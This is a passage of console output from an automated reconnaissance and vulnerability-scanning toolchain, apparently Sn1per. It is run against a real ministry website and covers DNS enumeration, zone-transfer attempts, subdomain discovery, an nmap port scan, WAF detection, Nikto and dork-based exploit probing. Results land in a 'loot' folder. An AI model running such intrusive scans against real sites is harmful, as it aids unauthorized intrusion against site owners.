  4267. ----------------------------------------
  4268.  
  4269.  
  4270. [-] Searching for pdf files, with a limit of 200
  4271. Searching 100 results...
  4272. Searching 200 results...
  4273. Results: 0 files found
  4274. Starting to download 50 of them:
  4275. ----------------------------------------
  4276.  
  4277.  
  4278. [-] Searching for xls files, with a limit of 200
  4279. Searching 100 results...
  4280. Searching 200 results...
  4281. Results: 0 files found
  4282. Starting to download 50 of them:
  4283. ----------------------------------------
  4284.  
  4285.  
  4286. [-] Searching for csv files, with a limit of 200
  4287. Searching 100 results...
  4288. Searching 200 results...
  4289. Results: 0 files found
  4290. Starting to download 50 of them:
  4291. ----------------------------------------
  4292.  
  4293.  
  4294. [-] Searching for txt files, with a limit of 200
  4295. Searching 100 results...
  4296. Searching 200 results...
  4297. Results: 0 files found
  4298. Starting to download 50 of them:
  4299. ----------------------------------------
  4300.  
  4301. processing
  4302. user
  4303. email
  4304.  
  4305. [+] List of users found:
  4306. --------------------------
  4307.  
  4308. [+] List of software found:
  4309. -----------------------------
  4310.  
  4311. [+] List of paths and servers found:
  4312. ---------------------------------------
  4313.  
  4314. [+] List of e-mails found:
  4315. ----------------------------
  4316.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  4317.  
  4318. ; <<>> DiG 9.11.2-5-Debian <<>> -x wordofknowledgeministries.com
  4319. ;; global options: +cmd
  4320. ;; Got answer:
  4321. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 40521
  4322. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  4323.  
  4324. ;; OPT PSEUDOSECTION:
  4325. ; EDNS: version: 0, flags:; udp: 4096
  4326. ;; QUESTION SECTION:
  4327. ;com.wordofknowledgeministries.in-addr.arpa. IN PTR
  4328.  
  4329. ;; AUTHORITY SECTION:
  4330. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102524 1800 900 604800 3600
  4331.  
  4332. ;; Query time: 197 msec
  4333. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  4334. ;; WHEN: Fri Jan 05 23:02:59 EST 2018
  4335. ;; MSG SIZE rcvd: 139
  4336.  
  4337. dnsenum VERSION:1.2.4
  4338. 
  4339. ----- wordofknowledgeministries.com -----
  4340. 
  4341.  
  4342. Host's addresses:
  4343. __________________
  4344.  
  4345. wordofknowledgeministries.com. 3556 IN A 192.124.249.7
  4346. 
  4347.  
  4348. Name Servers:
  4349. ______________
  4350.  
  4351. ns3.inetu.net. 3600 IN A 74.85.141.3
  4352. ns4.inetu.net. 3600 IN A 74.85.141.4
  4353. 
  4354.  
  4355. Mail (MX) Servers:
  4356. ___________________
  4357.  
  4358. mail.wordofknowledgeministries.com. 3556 IN A 192.124.249.7
  4359. 
  4360.  
  4361. Trying Zone Transfers and getting Bind Versions:
  4362. _________________________________________________
  4363.  
  4364. 
  4365. Trying Zone Transfer for wordofknowledgeministries.com on ns3.inetu.net ...
  4366.  
  4367. Trying Zone Transfer for wordofknowledgeministries.com on ns4.inetu.net ...
  4368.  
  4369. brute force file not specified, bay.
  4370.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  4371. 
  4372. ____ _ _ _ _ _____
  4373. / ___| _ _| |__ | (_)___| |_|___ / _ __
  4374. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  4375. ___) | |_| | |_) | | \__ \ |_ ___) | |
  4376. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  4377.  
  4378. # Coded By Ahmed Aboul-Ela - @aboul3la
  4379.  
  4380. [-] Enumerating subdomains now for wordofknowledgeministries.com
  4381. [-] verbosity is enabled, will show the subdomains results in realtime
  4382. [-] Searching now in Baidu..
  4383. [-] Searching now in Yahoo..
  4384. [-] Searching now in Google..
  4385. [-] Searching now in Bing..
  4386. [-] Searching now in Ask..
  4387. [-] Searching now in Netcraft..
  4388. [-] Searching now in DNSdumpster..
  4389. [-] Searching now in Virustotal..
  4390. [-] Searching now in ThreatCrowd..
  4391. [-] Searching now in SSL Certificates..
  4392. [-] Searching now in PassiveDNS..
  4393. Virustotal: www.wordofknowledgeministries.com
  4394. Virustotal: mail.wordofknowledgeministries.com
  4395. SSL Certificates: www.wordofknowledgeministries.com
  4396. Bing: www.wordofknowledgeministries.com
  4397. Yahoo: www.wordofknowledgeministries.com
  4398. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-wordofknowledgeministries.com.txt
  4399. [-] Total Unique Subdomains Found: 2
  4400. www.wordofknowledgeministries.com
  4401. mail.wordofknowledgeministries.com
  4402.  
  4403.  ╔═╗╩═╗╔╩╗╔═╗╩ ╩
  4404.  ║ ╠╩╝ ║ ╚═╗╠═╣
  4405.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  4406.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  4407. 
  4408. www.wordofknowledgeministries.com
  4409.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-wordofknowledgeministries.com-full.txt
  4410. 
  4411.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  4412.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  4413.  
  4414.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  4415. PING wordofknowledgeministries.com (192.124.249.7) 56(84) bytes of data.
  4416. 64 bytes from cloudproxy10007.sucuri.net (192.124.249.7): icmp_seq=1 ttl=55 time=34.7 ms
  4417.  
  4418. --- wordofknowledgeministries.com ping statistics ---
  4419. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  4420. rtt min/avg/max/mdev = 34.767/34.767/34.767/0.000 ms
  4421.  
  4422.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  4423.  
  4424. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 23:03 EST
  4425. Nmap scan report for wordofknowledgeministries.com (192.124.249.7)
  4426. Host is up (0.035s latency).
  4427. rDNS record for 192.124.249.7: cloudproxy10007.sucuri.net
  4428. Not shown: 471 filtered ports
  4429. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  4430. PORT STATE SERVICE
  4431. 80/tcp open http
  4432. 443/tcp open https
  4433.  
  4434. Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds
  4435.  
  4436.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  4437.  + -- --=[Port 21 closed... skipping.
  4438.  + -- --=[Port 22 closed... skipping.
  4439.  + -- --=[Port 23 closed... skipping.
  4440.  + -- --=[Port 25 closed... skipping.
  4441.  + -- --=[Port 53 closed... skipping.
  4442.  + -- --=[Port 79 closed... skipping.
  4443.  + -- --=[Port 80 opened... running tests...
  4444.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  4445.  
  4446. ^ ^
  4447. _ __ _ ____ _ __ _ _ ____
  4448. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  4449. | V V // o // _/ | V V // 0 // 0 // _/
  4450. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  4451. <
  4452. ...'
  4453.  
  4454. WAFW00F - Web Application Firewall Detection Tool
  4455.  
  4456. By Sandro Gauci && Wendel G. Henrique
  4457.  
  4458. Checking http://wordofknowledgeministries.com
  4459.  
  4460.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  4461. http://wordofknowledgeministries.com [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx], IP[192.124.249.7], RedirectLocation[https://wordofknowledgeministries.com/], Title[301 Moved Permanently], UncommonHeaders[x-sucuri-id], nginx
  4462. https://wordofknowledgeministries.com/ [403 Forbidden] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx], IP[192.124.249.7], Title[Sucuri WebSite Firewall - Access Denied], UncommonHeaders[x-sucuri-id], nginx
  4463.  
  4464.  __ ______ _____ 
  4465.  \ \/ / ___|_ _|
  4466.  \ /\___ \ | | 
  4467.  / \ ___) || | 
  4468.  /_/\_|____/ |_| 
  4469.  
  4470. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  4471. + -- --=[Target: wordofknowledgeministries.com:80
  4472. + -- --=[Site not vulnerable to Cross-Site Tracing!
  4473. + -- --=[Site not vulnerable to Host Header Injection!
  4474.  
  4475.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  4476. + -- --=[Checking if X-Content options are enabled on wordofknowledgeministries.com... 
  4477.  
  4478. + -- --=[Checking if X-Frame options are enabled on wordofknowledgeministries.com... 
  4479.  
  4480. + -- --=[Checking if X-XSS-Protection header is enabled on wordofknowledgeministries.com... 
  4481.  
  4482. + -- --=[Checking HTTP methods on wordofknowledgeministries.com... 
  4483.  
  4484. + -- --=[Checking if TRACE method is enabled on wordofknowledgeministries.com... 
  4485.  
  4486. + -- --=[Checking for META tags on wordofknowledgeministries.com... 
  4487.  
  4488. + -- --=[Checking for open proxy on wordofknowledgeministries.com... 
  4489. <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp" name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script>(function(){window.google={kEI:'mEpQWu6yEYmhggfGlJzoCQ',kEXPI:'18167,1354277,1354916,1355220,1355457,1355675,1355792,1355915,1356118,1356171,1356524,1356806,1356947,1357219,3700331,3700519,3700521,4003510,4029815,4031109,4043492,4045841,4048347,4081039,4081164,4092150,4095910,4097153,4097470,4097922,4097929,4098721,4098728,4098752,4102238,4102827,4103475,4107914,4108511,4109316,4109490,4113216,4114597,4115697,4116350,4116724,4116731,4116926,4116927,4116935,4117980,4118798,4119032,4119034,4119036,4120660,4121175,4121518,4121806,4122511,4124091,4124850,4125837,4126205,4126730,4127262,4127306,4127445,4127473,4127744,4127863,4128044,4128586,4128624,4129001,4129555,4129633,4130783,4131247,4131834,4132956,4133113,4133403,4133509,4134403,4134717,4135025,4135088,4135249,4135747,4135934,4136073,4136137,4137458,4137597,4137646,4141049,4141241,4141281,4141469,4141707,4141915,4142071,4142328,4142361,4142420,4142503,4142729,4142829,4142834,4143278,4143527,4143655,4143902,4144240,4144244,4144442,4144560,4144704,4145088,4145173,4145461,4145487,4145714,4146146,4146880,4147043,4147056,4147663,4147800,4147951,4148257,4148304,4148435,4148571,4148746,6512307,10200083,10202524,10202562,15807764,19000288,19000423,19000427,19001999,19002287,19002288,19002366,19002548,19002563,19002880,19003321,19003323,19003325,19003326,19003328,19003329,19003330,19003407,19003408,19003409,19004309,19004516,19004517,19004518,19004519,19004520,19004521,19004531,19004656,19004668,19004670,22312955,41317155',authuser:0,kscs:'c9c918f0_mEpQWu6yEYmhggfGlJzoCQ',u:'c9c918f0',kGL:'US'};google.kHL='en';})();(function(){google.lc=[];google.li=0;google.getEI=function(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||google.kEI};google.getLEI=function(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b};google.https=function(){return"https:"==window.location.protocol};google.ml=function(){return null};google.wl=function(a,b){try{google.ml(Error(a),!1,b)}catch(d){}};google.time=function(){return(new Date).getTime()};google.log=function(a,b,d,c,g){if(a=google.logUrl(a,b,d,c,g)){b=new Image;var e=google.lc,f=google.li;e[f]=b;b.onerror=b.onload=b.onabort=function(){delete e[f]};google.vel&&google.vel.lu&&google.vel.lu(a);b.src=a;google.li=f+1}};google.logUrl=function(a,b,d,c,g){var e="",f=google.ls||"";d||-1!=b.search("&ei=")||(e="&ei="+google.getEI(c),-1==b.search("&lei=")&&(c=google.getLEI(c))&&(e+="&lei="+c));c="";!d&&google.cshid&&-1==b.search("&cshid=")&&(c="&cshid="+google.cshid);a=d||"/"+(g||"gen_204")+"?atyp=i&ct="+a+"&cad="+b+e+f+"&zx="+google.time()+c;/^http:/i.test(a)&&google.https()&&(google.ml(Error("a"),!1,{src:a,glmm:1}),a="");return a};}).call(this);(function(){google.y={};google.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(google.y[c])}google.y[c]=[a,b];return!1};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};}).call(this);google.f={};var a=window.location,b=a.href.indexOf("#");if(0<=b){var c=a.href.substring(b+1);/(^|&)q=/.test(c)&&-1==c.indexOf("#")&&a.replace("/search?"+c.replace(/(^|&)fp=[^&]*/g,"")+"&cad=h")};</script><style>#gbar,#guser{font-size:13px;padding-top:1px !important;}#gbar{height:22px}#guser{padding-bottom:7px !important;text-align:right}.gbh,.gbd{border-top:1px solid #c9d7f1;font-size:1px}.gbh{height:0;position:absolute;top:24px;width:100%}@media all{.gb1{height:22px;margin-right:.5em;vertical-align:top}#gbar{float:left}}a.gb1,a.gb4{text-decoration:underline !important}a.gb1,a.gb4{color:#00c !important}.gbi .gb4{color:#dd8e27 !important}.gbf .gb4{color:#900 !important}
  4490. </style><style>body,td,a,p,.h{font-family:arial,sans-serif}body{margin:0;overflow-y:scroll}#gog{padding:3px 8px 0}td{line-height:.8em}.gac_m td{line-height:17px}form{margin-bottom:20px}.h{color:#36c}.q{color:#00c}.ts td{padding:0}.ts{border-collapse:collapse}em{font-weight:bold;font-style:normal}.lst{height:25px;width:496px}.gsfi,.lst{font:18px arial,sans-serif}.gsfs{font:17px arial,sans-serif}.ds{display:inline-box;display:inline-block;margin:3px 0 4px;margin-left:4px}input{font-family:inherit}a.gb1,a.gb2,a.gb3,a.gb4{color:#11c !important}body{background:#fff;color:black}a{color:#11c;text-decoration:none}a:hover,a:active{text-decoration:underline}.fl a{color:#36c}a:visited{color:#551a8b}a.gb1,a.gb4{text-decoration:underline}a.gb3:hover{text-decoration:none}#ghead a.gb2:hover{color:#fff !important}.sblc{padding-top:5px}.sblc a{display:block;margin:2px 0;margin-left:13px;font-size:11px}.lsbb{background:#eee;border:solid 1px;border-color:#ccc #999 #999 #ccc;height:30px}.lsbb{display:block}.ftl,#fll a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0 -261px repeat-x;border:none;color:#000;cursor:pointer;height:30px;margin:0;outline:0;font:15px arial,sans-serif;vertical-align:top}.lsb:active{background:#ccc}.lst:focus{outline:none}</style><script></script><link href="/images/branding/product/ico/googleg_lodp.ico" rel="shortcut icon"></head><body bgcolor="#fff"><script>(function(){var src='/images/nav_logo229.png';var iesg=false;document.body.onload = function(){window.n && window.n();if (document.images){new Image().src=src;}
  4491. if (!iesg){document.f&&document.f.q.focus();document.gbqf&&document.gbqf.q.focus();}
  4492. }
  4493. })();</script><div id="mngb"> <div id=gbar><nobr><b class=gb1>Search</b> <a class=gb1 href="http://www.google.com/imghp?hl=en&tab=wi">Images</a> <a class=gb1 href="http://maps.google.com/maps?hl=en&tab=wl">Maps</a> <a class=gb1 href="https://play.google.com/?hl=en&tab=w8">Play</a> <a class=gb1 href="http://www.youtube.com/?gl=US&tab=w1">YouTube</a> <a class=gb1 href="http://news.google.com/nwshp?hl=en&tab=wn">News</a> <a class=gb1 href="https://mail.google.com/mail/?tab=wm">Gmail</a> <a class=gb1 href="https://drive.google.com/?tab=wo">Drive</a> <a class=gb1 style="text-decoration:none" href="https://www.google.com/intl/en/options/"><u>More</u> &raquo;</a></nobr></div><div id=guser width=100%><nobr><span id=gbn class=gbi></span><span id=gbf class=gbf></span><span id=gbe></span><a href="http://www.google.com/history/optout?hl=en" class=gb4>Web History</a> | <a href="/preferences?hl=en" class=gb4>Settings</a> | <a target=_top id=gb_70 href="https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/" class=gb4>Sign in</a></nobr></div><div class=gbh style=left:0></div><div class=gbh style=right:0></div> </div><center><br clear="all" id="lgpd"><div id="lga"><img alt="Google" height="92" src="/images/branding/googlelogo/1x/googlelogo_white_background_color_272x92dp.png" style="padding:28px 0 14px" width="272" id="hplogo" onload="window.lol&&lol()"><br><br></div><form action="/search" name="f"><table cellpadding="0" cellspacing="0"><tr valign="top"><td width="25%">&nbsp;</td><td align="center" nowrap=""><input name="ie" value="ISO-8859-1" type="hidden"><input value="en" name="hl" type="hidden"><input name="source" type="hidden" value="hp"><input name="biw" type="hidden"><input name="bih" type="hidden"><div class="ds" style="height:32px;margin:4px 0"><input style="color:#000;margin:0;padding:5px 8px 0 6px;vertical-align:top" autocomplete="off" class="lst" value="" title="Google Search" maxlength="2048" name="q" size="57"></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="Google Search" name="btnG" type="submit"></span></span><span class="ds"><span class="lsbb"><input class="lsb" value="I'm Feeling Lucky" name="btnI" onclick="if(this.form.q.value)this.checked=1; else top.location='/doodles/'" type="submit"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a><a href="/language_tools?hl=en&amp;authuser=0">Language tools</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"></form><div id="gac_scont"></div><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="fll"><a href="/intl/en/ads/">Advertising Programs</a><a href="/services/">Business Solutions</a><a href="https://plus.google.com/116899029375914044550" rel="publisher">+Google</a><a href="/intl/en/about.html">About Google</a></div></div><p style="color:#767676;font-size:8pt">&copy; 2018 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script>(function(){window.google.cdo={height:0,width:0};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d="CSS1Compat"==c.compatMode?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}a&&b&&(a!=google.cdo.width||b!=google.cdo.height)&&google.log("","","/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI);}).call(this);})();</script><div id="xjsd"></div><div id="xjsi"><script>(function(){function c(b){window.setTimeout(function(){var a=document.createElement("script");a.src=b;google.timers&&google.timers.load.t&&google.tick("load",{gen204:"xjsls",clearcut:31});document.getElementById("xjsd").appendChild(a)},0)}google.dljp=function(b,a){google.xjsu=b;c(a)};google.dlj=c;}).call(this);(function(){var r=[];google.plm(r);})();if(!google.xjs){window._=window._||{};window._DumpException=window._._DumpException=function(e){throw e};google.dljp('/xjs/_/js/k\x3dxjs.hp.en_US.JikK2pMVffU.O/m\x3dsb_he,d/am\x3dAAg/rt\x3dj/d\x3d1/t\x3dzcms/rs\x3dACT90oEK0V5PFIa0k02rVyjM26_15qRSGA','/xjs/_/js/k\x3dxjs.hp.en_US.JikK2pMVffU.O/m\x3dsb_he,d/am\x3dAAg/rt\x3dj/d\x3d1/t\x3dzcms/rs\x3dACT90oEK0V5PFIa0k02rVyjM26_15qRSGA');google.xjs=1;}google.pmc={"sb_he":{"agen":true,"cgen":true,"client":"heirloom-hp","dh":true,"dhqt":true,"ds":"","ffql":"en","fl":true,"host":"google.com","isbh":28,"jam":0,"jsonp":true,"msgs":{"cibl":"Clear Search","dym":"Did you mean:","lcky":"I\u0026#39;m Feeling Lucky","lml":"Learn more","oskt":"Input tools","psrc":"This search was removed from your \u003Ca href=\"/history\"\u003EWeb History\u003C/a\u003E","psrl":"Remove","sbit":"Search by image","srch":"Google Search"},"nds":true,"ovr":{},"pq":"","refpd":true,"rfs":[],"sbpl":24,"sbpr":24,"scd":10,"sce":5,"stok":"Wlr5kurncfRv52nrDJ5QAlTJDQ0"},"d":{},"YFCs/g":{}};google.x(null,function(){});(function(){var ctx=[]
  4494. ;google.jsc && google.jsc.x(ctx);})();</script></div></body></html>
  4495. + -- --=[Enumerating software on wordofknowledgeministries.com... 
  4496. Server: nginx
  4497.  
  4498. + -- --=[Checking if Strict-Transport-Security is enabled on wordofknowledgeministries.com... 
  4499.  
  4500. + -- --=[Checking for Flash cross-domain policy on wordofknowledgeministries.com... 
  4501. <html>
  4502. <head><title>301 Moved Permanently</title></head>
  4503. <body bgcolor="white">
  4504. <center><h1>301 Moved Permanently</h1></center>
  4505. <hr><center>nginx</center>
  4506. </body>
  4507. </html>
  4508.  
  4509. + -- --=[Checking for Silverlight cross-domain policy on wordofknowledgeministries.com... 
  4510. <html>
  4511. <head><title>301 Moved Permanently</title></head>
  4512. <body bgcolor="white">
  4513. <center><h1>301 Moved Permanently</h1></center>
  4514. <hr><center>nginx</center>
  4515. </body>
  4516. </html>
  4517.  
  4518. + -- --=[Checking for HTML5 cross-origin resource sharing on wordofknowledgeministries.com... 
  4519.  
  4520. + -- --=[Retrieving robots.txt on wordofknowledgeministries.com... 
  4521. <html>
  4522. <head><title>301 Moved Permanently</title></head>
  4523. <body bgcolor="white">
  4524. <center><h1>301 Moved Permanently</h1></center>
  4525. <hr><center>nginx</center>
  4526. </body>
  4527. </html>
  4528.  
  4529. + -- --=[Retrieving sitemap.xml on wordofknowledgeministries.com... 
  4530. <html>
  4531. <head><title>301 Moved Permanently</title></head>
  4532. <body bgcolor="white">
  4533. <center><h1>301 Moved Permanently</h1></center>
  4534. <hr><center>nginx</center>
  4535. </body>
  4536. </html>
  4537.  
  4538. + -- --=[Checking cookie attributes on wordofknowledgeministries.com... 
  4539.  
  4540. + -- --=[Checking for ASP.NET Detailed Errors on wordofknowledgeministries.com... 
  4541. <link href="/templates/system/css/error.css" rel="stylesheet" />
  4542. <div class="error">
  4543. <div id="errorboxoutline">
  4544. <div id="errorboxheader">404 - Article not found</div>
  4545. <div id="errorboxbody">
  4546. <li>An error has occurred while processing your request.</li>
  4547. <p>If difficulties persist, please contact the System Administrator of this site and report the error below.</p>
  4548.  
  4549. 
  4550.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  4551. - Nikto v2.1.6
  4552. ---------------------------------------------------------------------------
  4553. + Target IP: 192.124.249.7
  4554. + Target Hostname: wordofknowledgeministries.com
  4555. + Target Port: 80
  4556. + Start Time: 2018-01-05 23:03:37 (GMT-5)
  4557. ---------------------------------------------------------------------------
  4558. + Server: nginx
  4559. + The anti-clickjacking X-Frame-Options header is not present.
  4560. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  4561. + Uncommon header 'x-sucuri-id' found, with contents: 14007
  4562. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  4563. + Root page / redirects to: https://wordofknowledgeministries.com/
  4564. + Scan terminated: 20 error(s) and 4 item(s) reported on remote host
  4565. + End Time: 2018-01-05 23:10:20 (GMT-5) (403 seconds)
  4566. ---------------------------------------------------------------------------
  4567. + 1 host(s) tested
  4568.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  4569. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/wordofknowledgeministries.com-port80.jpg
  4570.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  4571.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  4572.  
  4573.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  4574.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
  4575.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
  4576.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
  4577.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
  4578.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
  4579.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  4580.  
  4581. __[ ! ] Neither war between hackers, nor peace for the system.
  4582. __[ ! ] http://blog.inurl.com.br
  4583. __[ ! ] http://fb.com/InurlBrasil
  4584. __[ ! ] http://twitter.com/@googleinurl
  4585. __[ ! ] http://github.com/googleinurl
  4586. __[ ! ] Current PHP version::[ 7.0.26-1 ]
  4587. __[ ! ] Current script owner::[ root ]
  4588. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
  4589. __[ ! ] Current pwd::[ /usr/share/sniper ]
  4590. __[ ! ] Help: php inurlbr.php --help
  4591. ------------------------------------------------------------------------------------------------------------------------
  4592.  
  4593. [ ! ] Starting SCANNER INURLBR 2.1 at [05-01-2018 23:12:28]
  4594. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  4595. It is the end user's responsibility to obey all applicable local, state and federal laws.
  4596. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  4597.  
  4598. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-wordofknowledgeministries.com.txt ]
  4599. [ INFO ][ DORK ]::[ site:wordofknowledgeministries.com ]
  4600. [ INFO ][ SEARCHING ]:: {
  4601. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.jp ]
  4602.  
  4603. [ INFO ][ SEARCHING ]:: 
  4604. -[:::]
  4605. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  4606.  
  4607. [ INFO ][ SEARCHING ]:: 
  4608. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  4609. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.tr ID: 006748068166572874491:55ez0c3j3ey ]
  4610.  
  4611. [ INFO ][ SEARCHING ]:: 
  4612. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  4613.  
  4614. [ INFO ][ TOTAL FOUND VALUES ]:: [ 13 ]
  4615.  
  4616. 
  4617.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4618. |_[ + ] [ 0 / 13 ]-[23:12:43] [ - ] 
  4619. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/ ]
  4620. |_[ + ] Exploit:: 
  4621. |_[ + ] Information Server:: , , IP::0 
  4622. |_[ + ] More details:: 
  4623. |_[ + ] Found:: UNIDENTIFIED
  4624. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4625. 
  4626.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4627. |_[ + ] [ 1 / 13 ]-[23:12:48] [ - ] 
  4628. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/mission ]
  4629. |_[ + ] Exploit:: 
  4630. |_[ + ] Information Server:: , , IP::0 
  4631. |_[ + ] More details:: 
  4632. |_[ + ] Found:: UNIDENTIFIED
  4633. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4634. 
  4635.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4636. |_[ + ] [ 2 / 13 ]-[23:12:53] [ - ] 
  4637. |_[ + ] Target:: [ https://wordofknowledgeministries.com/online-donation ]
  4638. |_[ + ] Exploit:: 
  4639. |_[ + ] Information Server:: , , IP::0 
  4640. |_[ + ] More details:: 
  4641. |_[ + ] Found:: UNIDENTIFIED
  4642. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4643. 
  4644.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4645. |_[ + ] [ 3 / 13 ]-[23:12:58] [ - ] 
  4646. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/contact-us ]
  4647. |_[ + ] Exploit:: 
  4648. |_[ + ] Information Server:: , , IP::0 
  4649. |_[ + ] More details:: 
  4650. |_[ + ] Found:: UNIDENTIFIED
  4651. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4652. 
  4653.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4654. |_[ + ] [ 4 / 13 ]-[23:13:03] [ - ] 
  4655. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/about-us ]
  4656. |_[ + ] Exploit:: 
  4657. |_[ + ] Information Server:: , , IP::0 
  4658. |_[ + ] More details:: 
  4659. |_[ + ] Found:: UNIDENTIFIED
  4660. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4661. 
  4662.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4663. |_[ + ] [ 5 / 13 ]-[23:13:08] [ - ] 
  4664. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/prayer-request ]
  4665. |_[ + ] Exploit:: 
  4666. |_[ + ] Information Server:: , , IP::0 
  4667. |_[ + ] More details:: 
  4668. |_[ + ] Found:: UNIDENTIFIED
  4669. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4670. 
  4671.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4672. |_[ + ] [ 6 / 13 ]-[23:13:13] [ - ] 
  4673. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/more-photos ]
  4674. |_[ + ] Exploit:: 
  4675. |_[ + ] Information Server:: , , IP::0 
  4676. |_[ + ] More details:: 
  4677. |_[ + ] Found:: UNIDENTIFIED
  4678. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4679. 
  4680.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4681. |_[ + ] [ 7 / 13 ]-[23:13:18] [ - ] 
  4682. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/ministries/leaders ]
  4683. |_[ + ] Exploit:: 
  4684. |_[ + ] Information Server:: , , IP::0 
  4685. |_[ + ] More details:: 
  4686. |_[ + ] Found:: UNIDENTIFIED
  4687. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4688. 
